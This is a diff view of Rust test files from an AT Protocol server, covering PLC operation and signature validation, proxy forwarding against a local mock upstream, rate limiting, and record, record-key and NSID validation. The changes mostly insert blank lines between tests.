fn test_validate_plc_operation_missing_also_known_as() {
103
let op = json!({
···
110
let result = validate_plc_operation(&op);
111
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
112
}
113
+
114
#[test]
115
fn test_validate_plc_operation_missing_services() {
116
let op = json!({
···
123
let result = validate_plc_operation(&op);
124
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
125
}
126
+
127
#[test]
128
fn test_validate_rotation_key_required() {
129
let key = SigningKey::random(&mut rand::thread_rng());
···
151
let result = validate_plc_operation_for_submission(&op, &ctx);
152
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
153
}
154
+
155
#[test]
156
fn test_validate_signing_key_match() {
157
let key = SigningKey::random(&mut rand::thread_rng());
···
179
let result = validate_plc_operation_for_submission(&op, &ctx);
180
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
181
}
182
+
183
#[test]
184
fn test_validate_handle_match() {
185
let key = SigningKey::random(&mut rand::thread_rng());
···
206
let result = validate_plc_operation_for_submission(&op, &ctx);
207
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
208
}
209
+
210
#[test]
211
fn test_validate_pds_service_type() {
212
let key = SigningKey::random(&mut rand::thread_rng());
···
233
let result = validate_plc_operation_for_submission(&op, &ctx);
234
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
235
}
236
+
237
#[test]
238
fn test_validate_pds_endpoint_match() {
239
let key = SigningKey::random(&mut rand::thread_rng());
···
260
let result = validate_plc_operation_for_submission(&op, &ctx);
261
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
262
}
263
+
264
#[test]
265
fn test_verify_signature_secp256k1() {
266
let key = SigningKey::random(&mut rand::thread_rng());
···
279
assert!(result.is_ok());
280
assert!(result.unwrap());
281
}
282
+
283
#[test]
284
fn test_verify_signature_wrong_key() {
285
let key = SigningKey::random(&mut rand::thread_rng());
···
299
assert!(result.is_ok());
300
assert!(!result.unwrap());
301
}
302
+
303
#[test]
304
fn test_verify_signature_invalid_did_key_format() {
305
let key = SigningKey::random(&mut rand::thread_rng());
···
317
assert!(result.is_ok());
318
assert!(!result.unwrap());
319
}
320
+
321
#[test]
322
fn test_tombstone_validation() {
323
let op = json!({
···
328
let result = validate_plc_operation(&op);
329
assert!(result.is_ok());
330
}
331
+
332
#[test]
333
fn test_cid_for_cbor_deterministic() {
334
let value = json!({
···
340
assert_eq!(cid1, cid2, "CID generation should be deterministic");
341
assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)");
342
}
343
+
344
#[test]
345
fn test_cid_different_for_different_data() {
346
let value1 = json!({"data": 1});
···
349
let cid2 = cid_for_cbor(&value2).unwrap();
350
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
351
}
352
+
353
#[test]
354
fn test_signing_key_to_did_key_format() {
355
let key = SigningKey::random(&mut rand::thread_rng());
···
357
assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z");
358
assert!(did_key.len() > 50, "Did key should be reasonably long");
359
}
360
+
361
#[test]
362
fn test_signing_key_to_did_key_unique() {
363
let key1 = SigningKey::random(&mut rand::thread_rng());
···
366
let did2 = signing_key_to_did_key(&key2);
367
assert_ne!(did1, did2, "Different keys should produce different did:keys");
368
}
369
+
370
#[test]
371
fn test_signing_key_to_did_key_consistent() {
372
let key = SigningKey::random(&mut rand::thread_rng());
···
374
let did2 = signing_key_to_did_key(&key);
375
assert_eq!(did1, did2, "Same key should produce same did:key");
376
}
377
+
378
#[test]
379
fn test_sign_operation_removes_existing_sig() {
380
let key = SigningKey::random(&mut rand::thread_rng());
···
391
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
392
assert_ne!(new_sig, "old_signature", "Should replace old signature");
393
}
394
+
395
#[test]
396
fn test_validate_plc_operation_not_object() {
397
let result = validate_plc_operation(&json!("not an object"));
398
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
399
}
400
+
401
#[test]
402
fn test_validate_for_submission_tombstone_passes() {
403
let key = SigningKey::random(&mut rand::thread_rng());
···
416
let result = validate_plc_operation_for_submission(&op, &ctx);
417
assert!(result.is_ok(), "Tombstone should pass submission validation");
418
}
419
+
420
#[test]
421
fn test_verify_signature_missing_sig() {
422
let op = json!({
···
429
let result = verify_operation_signature(&op, &[]);
430
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
431
}
432
+
433
#[test]
434
fn test_verify_signature_invalid_base64() {
435
let op = json!({
···
443
let result = verify_operation_signature(&op, &[]);
444
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
445
}
446
+
447
#[test]
448
fn test_plc_operation_struct() {
449
let mut services = HashMap::new();
+5
tests/proxy.rs
+5
tests/proxy.rs
···
4
use reqwest::Client;
5
use std::sync::Arc;
6
use tokio::net::TcpListener;
7
async fn spawn_mock_upstream() -> (
8
String,
9
tokio::sync::mpsc::Receiver<(String, String, Option<String>)>,
···
31
});
32
(format!("http://{}", addr), rx)
33
}
34
#[tokio::test]
35
async fn test_proxy_via_header() {
36
let app_url = common::base_url().await;
···
49
assert_eq!(uri, "/xrpc/com.example.test");
50
assert_eq!(auth, Some("Bearer test-token".to_string()));
51
}
52
#[tokio::test]
53
async fn test_proxy_auth_signing() {
54
let app_url = common::base_url().await;
···
77
assert_eq!(claims["aud"], upstream_url);
78
assert_eq!(claims["lxm"], "com.example.signed");
79
}
80
#[tokio::test]
81
async fn test_proxy_post_with_body() {
82
let app_url = common::base_url().await;
···
100
assert_eq!(uri, "/xrpc/com.example.postMethod");
101
assert_eq!(auth, Some("Bearer test-token".to_string()));
102
}
103
#[tokio::test]
104
async fn test_proxy_with_query_params() {
105
let app_url = common::base_url().await;
···
4
use reqwest::Client;
5
use std::sync::Arc;
6
use tokio::net::TcpListener;
7
+
8
async fn spawn_mock_upstream() -> (
9
String,
10
tokio::sync::mpsc::Receiver<(String, String, Option<String>)>,
···
32
});
33
(format!("http://{}", addr), rx)
34
}
35
+
36
#[tokio::test]
37
async fn test_proxy_via_header() {
38
let app_url = common::base_url().await;
···
51
assert_eq!(uri, "/xrpc/com.example.test");
52
assert_eq!(auth, Some("Bearer test-token".to_string()));
53
}
54
+
55
#[tokio::test]
56
async fn test_proxy_auth_signing() {
57
let app_url = common::base_url().await;
···
80
assert_eq!(claims["aud"], upstream_url);
81
assert_eq!(claims["lxm"], "com.example.signed");
82
}
83
+
84
#[tokio::test]
85
async fn test_proxy_post_with_body() {
86
let app_url = common::base_url().await;
···
104
assert_eq!(uri, "/xrpc/com.example.postMethod");
105
assert_eq!(auth, Some("Bearer test-token".to_string()));
106
}
107
+
108
#[tokio::test]
109
async fn test_proxy_with_query_params() {
110
let app_url = common::base_url().await;
+5
tests/rate_limit.rs
+5
tests/rate_limit.rs
···
2
use common::{base_url, client};
3
use reqwest::StatusCode;
4
use serde_json::json;
5
#[tokio::test]
6
#[ignore = "rate limiting is disabled in test environment"]
7
async fn test_login_rate_limiting() {
···
39
rate_limited_count
40
);
41
}
42
#[tokio::test]
43
#[ignore = "rate limiting is disabled in test environment"]
44
async fn test_password_reset_rate_limiting() {
···
78
success_count
79
);
80
}
81
#[tokio::test]
82
#[ignore = "rate limiting is disabled in test environment"]
83
async fn test_account_creation_rate_limiting() {
···
117
rate_limited_count
118
);
119
}
120
#[tokio::test]
121
async fn test_valkey_connection() {
122
if std::env::var("VALKEY_URL").is_err() {
···
154
.await
155
.expect("DEL failed");
156
}
157
#[tokio::test]
158
async fn test_distributed_rate_limiter_directly() {
159
if std::env::var("VALKEY_URL").is_err() {
···
2
use common::{base_url, client};
3
use reqwest::StatusCode;
4
use serde_json::json;
5
+
6
#[tokio::test]
7
#[ignore = "rate limiting is disabled in test environment"]
8
async fn test_login_rate_limiting() {
···
40
rate_limited_count
41
);
42
}
43
+
44
#[tokio::test]
45
#[ignore = "rate limiting is disabled in test environment"]
46
async fn test_password_reset_rate_limiting() {
···
80
success_count
81
);
82
}
83
+
84
#[tokio::test]
85
#[ignore = "rate limiting is disabled in test environment"]
86
async fn test_account_creation_rate_limiting() {
···
120
rate_limited_count
121
);
122
}
123
+
124
#[tokio::test]
125
async fn test_valkey_connection() {
126
if std::env::var("VALKEY_URL").is_err() {
···
158
.await
159
.expect("DEL failed");
160
}
161
+
162
#[tokio::test]
163
async fn test_distributed_rate_limiter_directly() {
164
if std::env::var("VALKEY_URL").is_err() {
+53
tests/record_validation.rs
+53
tests/record_validation.rs
···
1
use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid};
2
use serde_json::json;
3
fn now() -> String {
4
chrono::Utc::now().to_rfc3339()
5
}
6
#[test]
7
fn test_validate_post_valid() {
8
let validator = RecordValidator::new();
···
14
let result = validator.validate(&post, "app.bsky.feed.post");
15
assert_eq!(result.unwrap(), ValidationStatus::Valid);
16
}
17
#[test]
18
fn test_validate_post_missing_text() {
19
let validator = RecordValidator::new();
···
24
let result = validator.validate(&post, "app.bsky.feed.post");
25
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
26
}
27
#[test]
28
fn test_validate_post_missing_created_at() {
29
let validator = RecordValidator::new();
···
34
let result = validator.validate(&post, "app.bsky.feed.post");
35
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
36
}
37
#[test]
38
fn test_validate_post_text_too_long() {
39
let validator = RecordValidator::new();
···
46
let result = validator.validate(&post, "app.bsky.feed.post");
47
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
48
}
49
#[test]
50
fn test_validate_post_text_at_limit() {
51
let validator = RecordValidator::new();
···
58
let result = validator.validate(&post, "app.bsky.feed.post");
59
assert_eq!(result.unwrap(), ValidationStatus::Valid);
60
}
61
#[test]
62
fn test_validate_post_too_many_langs() {
63
let validator = RecordValidator::new();
···
70
let result = validator.validate(&post, "app.bsky.feed.post");
71
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
72
}
73
#[test]
74
fn test_validate_post_three_langs_ok() {
75
let validator = RecordValidator::new();
···
82
let result = validator.validate(&post, "app.bsky.feed.post");
83
assert_eq!(result.unwrap(), ValidationStatus::Valid);
84
}
85
#[test]
86
fn test_validate_post_too_many_tags() {
87
let validator = RecordValidator::new();
···
94
let result = validator.validate(&post, "app.bsky.feed.post");
95
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
96
}
97
#[test]
98
fn test_validate_post_eight_tags_ok() {
99
let validator = RecordValidator::new();
···
106
let result = validator.validate(&post, "app.bsky.feed.post");
107
assert_eq!(result.unwrap(), ValidationStatus::Valid);
108
}
109
#[test]
110
fn test_validate_post_tag_too_long() {
111
let validator = RecordValidator::new();
···
119
let result = validator.validate(&post, "app.bsky.feed.post");
120
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
121
}
122
#[test]
123
fn test_validate_profile_valid() {
124
let validator = RecordValidator::new();
···
130
let result = validator.validate(&profile, "app.bsky.actor.profile");
131
assert_eq!(result.unwrap(), ValidationStatus::Valid);
132
}
133
#[test]
134
fn test_validate_profile_empty_ok() {
135
let validator = RecordValidator::new();
···
139
let result = validator.validate(&profile, "app.bsky.actor.profile");
140
assert_eq!(result.unwrap(), ValidationStatus::Valid);
141
}
142
#[test]
143
fn test_validate_profile_displayname_too_long() {
144
let validator = RecordValidator::new();
···
150
let result = validator.validate(&profile, "app.bsky.actor.profile");
151
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
152
}
153
#[test]
154
fn test_validate_profile_description_too_long() {
155
let validator = RecordValidator::new();
···
161
let result = validator.validate(&profile, "app.bsky.actor.profile");
162
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description"));
163
}
164
#[test]
165
fn test_validate_like_valid() {
166
let validator = RecordValidator::new();
···
175
let result = validator.validate(&like, "app.bsky.feed.like");
176
assert_eq!(result.unwrap(), ValidationStatus::Valid);
177
}
178
#[test]
179
fn test_validate_like_missing_subject() {
180
let validator = RecordValidator::new();
···
185
let result = validator.validate(&like, "app.bsky.feed.like");
186
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
187
}
188
#[test]
189
fn test_validate_like_missing_subject_uri() {
190
let validator = RecordValidator::new();
···
198
let result = validator.validate(&like, "app.bsky.feed.like");
199
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
200
}
201
#[test]
202
fn test_validate_like_invalid_subject_uri() {
203
let validator = RecordValidator::new();
···
212
let result = validator.validate(&like, "app.bsky.feed.like");
213
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
214
}
215
#[test]
216
fn test_validate_repost_valid() {
217
let validator = RecordValidator::new();
···
226
let result = validator.validate(&repost, "app.bsky.feed.repost");
227
assert_eq!(result.unwrap(), ValidationStatus::Valid);
228
}
229
#[test]
230
fn test_validate_repost_missing_subject() {
231
let validator = RecordValidator::new();
···
236
let result = validator.validate(&repost, "app.bsky.feed.repost");
237
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
238
}
239
#[test]
240
fn test_validate_follow_valid() {
241
let validator = RecordValidator::new();
···
247
let result = validator.validate(&follow, "app.bsky.graph.follow");
248
assert_eq!(result.unwrap(), ValidationStatus::Valid);
249
}
250
#[test]
251
fn test_validate_follow_missing_subject() {
252
let validator = RecordValidator::new();
···
257
let result = validator.validate(&follow, "app.bsky.graph.follow");
258
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
259
}
260
#[test]
261
fn test_validate_follow_invalid_subject() {
262
let validator = RecordValidator::new();
···
268
let result = validator.validate(&follow, "app.bsky.graph.follow");
269
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
270
}
271
#[test]
272
fn test_validate_block_valid() {
273
let validator = RecordValidator::new();
···
279
let result = validator.validate(&block, "app.bsky.graph.block");
280
assert_eq!(result.unwrap(), ValidationStatus::Valid);
281
}
282
#[test]
283
fn test_validate_block_invalid_subject() {
284
let validator = RecordValidator::new();
···
290
let result = validator.validate(&block, "app.bsky.graph.block");
291
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
292
}
293
#[test]
294
fn test_validate_list_valid() {
295
let validator = RecordValidator::new();
···
302
let result = validator.validate(&list, "app.bsky.graph.list");
303
assert_eq!(result.unwrap(), ValidationStatus::Valid);
304
}
305
#[test]
306
fn test_validate_list_name_too_long() {
307
let validator = RecordValidator::new();
···
315
let result = validator.validate(&list, "app.bsky.graph.list");
316
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
317
}
318
#[test]
319
fn test_validate_list_empty_name() {
320
let validator = RecordValidator::new();
···
327
let result = validator.validate(&list, "app.bsky.graph.list");
328
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
329
}
330
#[test]
331
fn test_validate_feed_generator_valid() {
332
let validator = RecordValidator::new();
···
339
let result = validator.validate(&generator, "app.bsky.feed.generator");
340
assert_eq!(result.unwrap(), ValidationStatus::Valid);
341
}
342
#[test]
343
fn test_validate_feed_generator_displayname_too_long() {
344
let validator = RecordValidator::new();
···
352
let result = validator.validate(&generator, "app.bsky.feed.generator");
353
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
354
}
355
#[test]
356
fn test_validate_unknown_type_returns_unknown() {
357
let validator = RecordValidator::new();
···
362
let result = validator.validate(&custom, "com.custom.record");
363
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
364
}
365
#[test]
366
fn test_validate_unknown_type_strict_rejects() {
367
let validator = RecordValidator::new().require_lexicon(true);
···
372
let result = validator.validate(&custom, "com.custom.record");
373
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
374
}
375
#[test]
376
fn test_validate_type_mismatch() {
377
let validator = RecordValidator::new();
···
384
assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
385
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"));
386
}
387
#[test]
388
fn test_validate_missing_type() {
389
let validator = RecordValidator::new();
···
393
let result = validator.validate(&record, "app.bsky.feed.post");
394
assert!(matches!(result, Err(ValidationError::MissingType)));
395
}
396
#[test]
397
fn test_validate_not_object() {
398
let validator = RecordValidator::new();
···
400
let result = validator.validate(&record, "app.bsky.feed.post");
401
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
402
}
403
#[test]
404
fn test_validate_datetime_format_valid() {
405
let validator = RecordValidator::new();
···
411
let result = validator.validate(&post, "app.bsky.feed.post");
412
assert_eq!(result.unwrap(), ValidationStatus::Valid);
413
}
414
#[test]
415
fn test_validate_datetime_with_offset() {
416
let validator = RecordValidator::new();
···
422
let result = validator.validate(&post, "app.bsky.feed.post");
423
assert_eq!(result.unwrap(), ValidationStatus::Valid);
424
}
425
#[test]
426
fn test_validate_datetime_invalid_format() {
427
let validator = RecordValidator::new();
···
433
let result = validator.validate(&post, "app.bsky.feed.post");
434
assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. })));
435
}
436
#[test]
437
fn test_validate_record_key_valid() {
438
assert!(validate_record_key("3k2n5j2").is_ok());
···
442
assert!(validate_record_key("valid~key").is_ok());
443
assert!(validate_record_key("self").is_ok());
444
}
445
#[test]
446
fn test_validate_record_key_empty() {
447
let result = validate_record_key("");
448
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
449
}
450
#[test]
451
fn test_validate_record_key_dot() {
452
assert!(validate_record_key(".").is_err());
453
assert!(validate_record_key("..").is_err());
454
}
455
#[test]
456
fn test_validate_record_key_invalid_chars() {
457
assert!(validate_record_key("invalid/key").is_err());
···
459
assert!(validate_record_key("invalid@key").is_err());
460
assert!(validate_record_key("invalid#key").is_err());
461
}
462
#[test]
463
fn test_validate_record_key_too_long() {
464
let long_key = "k".repeat(513);
465
let result = validate_record_key(&long_key);
466
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
467
}
468
#[test]
469
fn test_validate_record_key_at_max_length() {
470
let max_key = "k".repeat(512);
471
assert!(validate_record_key(&max_key).is_ok());
472
}
473
#[test]
474
fn test_validate_collection_nsid_valid() {
475
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
···
477
assert!(validate_collection_nsid("a.b.c").is_ok());
478
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
479
}
480
#[test]
481
fn test_validate_collection_nsid_empty() {
482
let result = validate_collection_nsid("");
483
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
484
}
485
#[test]
486
fn test_validate_collection_nsid_too_few_segments() {
487
assert!(validate_collection_nsid("a").is_err());
488
assert!(validate_collection_nsid("a.b").is_err());
489
}
490
#[test]
491
fn test_validate_collection_nsid_empty_segment() {
492
assert!(validate_collection_nsid("a..b.c").is_err());
493
assert!(validate_collection_nsid(".a.b.c").is_err());
494
assert!(validate_collection_nsid("a.b.c.").is_err());
495
}
496
#[test]
497
fn test_validate_collection_nsid_invalid_chars() {
498
assert!(validate_collection_nsid("a.b.c/d").is_err());
499
assert!(validate_collection_nsid("a.b.c_d").is_err());
500
assert!(validate_collection_nsid("a.b.c@d").is_err());
501
}
502
#[test]
503
fn test_validate_threadgate() {
504
let validator = RecordValidator::new();
···
510
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
511
assert_eq!(result.unwrap(), ValidationStatus::Valid);
512
}
513
#[test]
514
fn test_validate_labeler_service() {
515
let validator = RecordValidator::new();
···
523
let result = validator.validate(&labeler, "app.bsky.labeler.service");
524
assert_eq!(result.unwrap(), ValidationStatus::Valid);
525
}
526
#[test]
527
fn test_validate_list_item() {
528
let validator = RecordValidator::new();
···
1
use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid};
2
use serde_json::json;
3
+
4
fn now() -> String {
5
chrono::Utc::now().to_rfc3339()
6
}
7
+
8
#[test]
9
fn test_validate_post_valid() {
10
let validator = RecordValidator::new();
···
16
let result = validator.validate(&post, "app.bsky.feed.post");
17
assert_eq!(result.unwrap(), ValidationStatus::Valid);
18
}
19
+
20
#[test]
21
fn test_validate_post_missing_text() {
22
let validator = RecordValidator::new();
···
27
let result = validator.validate(&post, "app.bsky.feed.post");
28
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
29
}
30
+
31
#[test]
32
fn test_validate_post_missing_created_at() {
33
let validator = RecordValidator::new();
···
38
let result = validator.validate(&post, "app.bsky.feed.post");
39
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
40
}
41
+
42
#[test]
43
fn test_validate_post_text_too_long() {
44
let validator = RecordValidator::new();
···
51
let result = validator.validate(&post, "app.bsky.feed.post");
52
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
53
}
54
+
55
#[test]
56
fn test_validate_post_text_at_limit() {
57
let validator = RecordValidator::new();
···
64
let result = validator.validate(&post, "app.bsky.feed.post");
65
assert_eq!(result.unwrap(), ValidationStatus::Valid);
66
}
67
+
68
#[test]
69
fn test_validate_post_too_many_langs() {
70
let validator = RecordValidator::new();
···
77
let result = validator.validate(&post, "app.bsky.feed.post");
78
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
79
}
80
+
81
#[test]
82
fn test_validate_post_three_langs_ok() {
83
let validator = RecordValidator::new();
···
90
let result = validator.validate(&post, "app.bsky.feed.post");
91
assert_eq!(result.unwrap(), ValidationStatus::Valid);
92
}
93
+
94
#[test]
95
fn test_validate_post_too_many_tags() {
96
let validator = RecordValidator::new();
···
103
let result = validator.validate(&post, "app.bsky.feed.post");
104
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
105
}
106
+
107
#[test]
108
fn test_validate_post_eight_tags_ok() {
109
let validator = RecordValidator::new();
···
116
let result = validator.validate(&post, "app.bsky.feed.post");
117
assert_eq!(result.unwrap(), ValidationStatus::Valid);
118
}
119
+
120
#[test]
121
fn test_validate_post_tag_too_long() {
122
let validator = RecordValidator::new();
···
130
let result = validator.validate(&post, "app.bsky.feed.post");
131
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
132
}
133
+
134
#[test]
135
fn test_validate_profile_valid() {
136
let validator = RecordValidator::new();
···
142
let result = validator.validate(&profile, "app.bsky.actor.profile");
143
assert_eq!(result.unwrap(), ValidationStatus::Valid);
144
}
145
+
146
#[test]
147
fn test_validate_profile_empty_ok() {
148
let validator = RecordValidator::new();
···
152
let result = validator.validate(&profile, "app.bsky.actor.profile");
153
assert_eq!(result.unwrap(), ValidationStatus::Valid);
154
}
155
+
156
#[test]
157
fn test_validate_profile_displayname_too_long() {
158
let validator = RecordValidator::new();
···
164
let result = validator.validate(&profile, "app.bsky.actor.profile");
165
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
166
}
167
+
168
#[test]
169
fn test_validate_profile_description_too_long() {
170
let validator = RecordValidator::new();
···
176
let result = validator.validate(&profile, "app.bsky.actor.profile");
177
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description"));
178
}
179
+
180
#[test]
181
fn test_validate_like_valid() {
182
let validator = RecordValidator::new();
···
191
let result = validator.validate(&like, "app.bsky.feed.like");
192
assert_eq!(result.unwrap(), ValidationStatus::Valid);
193
}
194
+
195
#[test]
196
fn test_validate_like_missing_subject() {
197
let validator = RecordValidator::new();
···
202
let result = validator.validate(&like, "app.bsky.feed.like");
203
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
204
}
205
+
206
#[test]
207
fn test_validate_like_missing_subject_uri() {
208
let validator = RecordValidator::new();
···
216
let result = validator.validate(&like, "app.bsky.feed.like");
217
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
218
}
219
+
220
#[test]
221
fn test_validate_like_invalid_subject_uri() {
222
let validator = RecordValidator::new();
···
231
let result = validator.validate(&like, "app.bsky.feed.like");
232
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
233
}
234
+
235
#[test]
236
fn test_validate_repost_valid() {
237
let validator = RecordValidator::new();
···
246
let result = validator.validate(&repost, "app.bsky.feed.repost");
247
assert_eq!(result.unwrap(), ValidationStatus::Valid);
248
}
249
+
250
#[test]
251
fn test_validate_repost_missing_subject() {
252
let validator = RecordValidator::new();
···
257
let result = validator.validate(&repost, "app.bsky.feed.repost");
258
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
259
}
260
+
261
#[test]
262
fn test_validate_follow_valid() {
263
let validator = RecordValidator::new();
···
269
let result = validator.validate(&follow, "app.bsky.graph.follow");
270
assert_eq!(result.unwrap(), ValidationStatus::Valid);
271
}
272
+
273
#[test]
274
fn test_validate_follow_missing_subject() {
275
let validator = RecordValidator::new();
···
280
let result = validator.validate(&follow, "app.bsky.graph.follow");
281
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
282
}
283
+
284
#[test]
285
fn test_validate_follow_invalid_subject() {
286
let validator = RecordValidator::new();
···
292
let result = validator.validate(&follow, "app.bsky.graph.follow");
293
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
294
}
295
+
296
#[test]
297
fn test_validate_block_valid() {
298
let validator = RecordValidator::new();
···
304
let result = validator.validate(&block, "app.bsky.graph.block");
305
assert_eq!(result.unwrap(), ValidationStatus::Valid);
306
}
307
+
308
#[test]
309
fn test_validate_block_invalid_subject() {
310
let validator = RecordValidator::new();
···
316
let result = validator.validate(&block, "app.bsky.graph.block");
317
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
318
}
319
+
320
#[test]
321
fn test_validate_list_valid() {
322
let validator = RecordValidator::new();
···
329
let result = validator.validate(&list, "app.bsky.graph.list");
330
assert_eq!(result.unwrap(), ValidationStatus::Valid);
331
}
332
+
333
#[test]
334
fn test_validate_list_name_too_long() {
335
let validator = RecordValidator::new();
···
343
let result = validator.validate(&list, "app.bsky.graph.list");
344
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
345
}
346
+
347
#[test]
348
fn test_validate_list_empty_name() {
349
let validator = RecordValidator::new();
···
356
let result = validator.validate(&list, "app.bsky.graph.list");
357
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
358
}
359
+
360
#[test]
361
fn test_validate_feed_generator_valid() {
362
let validator = RecordValidator::new();
···
369
let result = validator.validate(&generator, "app.bsky.feed.generator");
370
assert_eq!(result.unwrap(), ValidationStatus::Valid);
371
}
372
+
373
#[test]
374
fn test_validate_feed_generator_displayname_too_long() {
375
let validator = RecordValidator::new();
···
383
let result = validator.validate(&generator, "app.bsky.feed.generator");
384
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
385
}
386
+
387
#[test]
388
fn test_validate_unknown_type_returns_unknown() {
389
let validator = RecordValidator::new();
···
394
let result = validator.validate(&custom, "com.custom.record");
395
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
396
}
397
+
398
#[test]
399
fn test_validate_unknown_type_strict_rejects() {
400
let validator = RecordValidator::new().require_lexicon(true);
···
405
let result = validator.validate(&custom, "com.custom.record");
406
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
407
}
408
+
409
#[test]
410
fn test_validate_type_mismatch() {
411
let validator = RecordValidator::new();
···
418
assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
419
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"));
420
}
421
+
422
#[test]
423
fn test_validate_missing_type() {
424
let validator = RecordValidator::new();
···
428
let result = validator.validate(&record, "app.bsky.feed.post");
429
assert!(matches!(result, Err(ValidationError::MissingType)));
430
}
431
+
432
#[test]
433
fn test_validate_not_object() {
434
let validator = RecordValidator::new();
···
436
let result = validator.validate(&record, "app.bsky.feed.post");
437
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
438
}
439
+
440
#[test]
441
fn test_validate_datetime_format_valid() {
442
let validator = RecordValidator::new();
···
448
let result = validator.validate(&post, "app.bsky.feed.post");
449
assert_eq!(result.unwrap(), ValidationStatus::Valid);
450
}
451
+
452
#[test]
453
fn test_validate_datetime_with_offset() {
454
let validator = RecordValidator::new();
···
460
let result = validator.validate(&post, "app.bsky.feed.post");
461
assert_eq!(result.unwrap(), ValidationStatus::Valid);
462
}
463
+
464
#[test]
465
fn test_validate_datetime_invalid_format() {
466
let validator = RecordValidator::new();
···
472
let result = validator.validate(&post, "app.bsky.feed.post");
473
assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. })));
474
}
475
+
476
#[test]
477
fn test_validate_record_key_valid() {
478
assert!(validate_record_key("3k2n5j2").is_ok());
···
482
assert!(validate_record_key("valid~key").is_ok());
483
assert!(validate_record_key("self").is_ok());
484
}
485
+
486
#[test]
487
fn test_validate_record_key_empty() {
488
let result = validate_record_key("");
489
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
490
}
491
+
492
#[test]
493
fn test_validate_record_key_dot() {
494
assert!(validate_record_key(".").is_err());
495
assert!(validate_record_key("..").is_err());
496
}
497
+
498
#[test]
499
fn test_validate_record_key_invalid_chars() {
500
assert!(validate_record_key("invalid/key").is_err());
···
502
assert!(validate_record_key("invalid@key").is_err());
503
assert!(validate_record_key("invalid#key").is_err());
504
}
505
+
506
#[test]
507
fn test_validate_record_key_too_long() {
508
let long_key = "k".repeat(513);
509
let result = validate_record_key(&long_key);
510
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
511
}
